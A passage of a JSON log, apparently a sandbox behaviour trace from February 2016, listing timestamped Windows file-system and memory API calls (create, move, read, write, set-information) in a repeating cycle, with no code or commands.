"filesystem", "timestamp": "2016-02-16 17:41:43,545", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,545", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,545", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,555", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,555", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,555", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,555", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,555", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,555", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,555", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,555", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,555", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,565", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,565", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,565", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,565", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,565", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,565", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,565", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,575", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,575", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:43,575", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,575", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,585", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,585", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,585", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,585", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,585", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,585", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,585", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,585", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,585", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,585", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,585", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,585", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,595", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,595", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,595", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,595", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,595", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,595", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,595", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:43,595", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,595", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,595", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,605", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,605", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,605", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,605", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,605", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,605", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,605", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,605", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,605", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,615", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,615", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,615", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,615", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,615", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,615", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,615", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,615", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,615", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,615", 
"api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,615", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,615", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,615", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,625", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,625", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,625", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,625", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,635", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,635", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,635", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,635", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,635", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,635", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,635", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,645", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,645", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,645", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,645", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,645", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,645", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,645", "api": 
"NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,645", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,655", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,655", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,655", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,655", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,655", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,655", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,655", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,655", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,655", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,655", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,655", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,655", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,655", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,665", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,665", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,665", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,665", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,665", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,665", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,665", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:43,665", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,665", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,675", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,675", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,675", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,675", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,675", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,675", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,675", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,675", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,675", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,675", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,685", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,685", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,685", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,685", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,685", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,685", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,685", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,685", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,695", "api": "NtReadFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:43,695", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,695", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,695", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,695", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,705", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,705", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,705", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,705", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,705", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,705", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,705", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,705", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,715", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,715", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,715", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,715", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,715", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,715", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,715", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,715", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,715", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:43,715", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,725", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,725", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,725", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,725", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,725", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,725", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,725", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,725", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,725", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,735", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,735", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,735", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,735", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,735", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,735", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,735", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,735", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,735", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,735", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,735", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:43,745", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,745", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,745", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,745", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,745", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,745", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,745", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,745", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,755", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,755", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,755", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,755", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,755", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,755", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,755", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,755", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,765", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,765", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,765", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,765", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,765", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,765", 
"api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,765", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,765", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,765", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,775", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,775", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,775", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,775", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,775", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,775", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,775", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,775", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,775", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,785", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,785", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,785", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,785", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,785", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,785", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,785", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,785", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,795", "api": 
"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,795", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,795", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,795", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,795", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,795", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,795", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,795", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,795", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,805", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,805", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,805", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,805", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,805", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,805", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,805", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,805", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,805", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,815", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,815", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,815", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,815", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:43,825", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,825", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,825", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,825", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,825", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,825", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,835", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,835", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,835", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,835", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,835", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,835", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,835", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,835", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,835", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,835", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,845", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,845", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,845", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,845", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,845", "api": "NtCreateFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:43,845", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,845", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,845", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,845", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,855", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,855", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,855", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,855", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,855", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,855", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,855", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,855", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,865", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,865", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,865", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,865", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,865", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,865", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,865", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,875", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,875", "api": "NtWriteFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:43,875", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,875", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,875", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,875", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,875", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,885", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,885", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,885", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,885", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,885", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,885", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,885", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,885", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,895", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,895", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,895", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,895", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,895", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,895", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,895", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,895", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:43,895", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,895", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,895", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,905", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,905", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,905", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,905", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,905", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,915", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,915", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,915", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,915", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,915", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,915", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,915", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,915", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,915", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,925", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,925", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,925", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,925", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,925", 
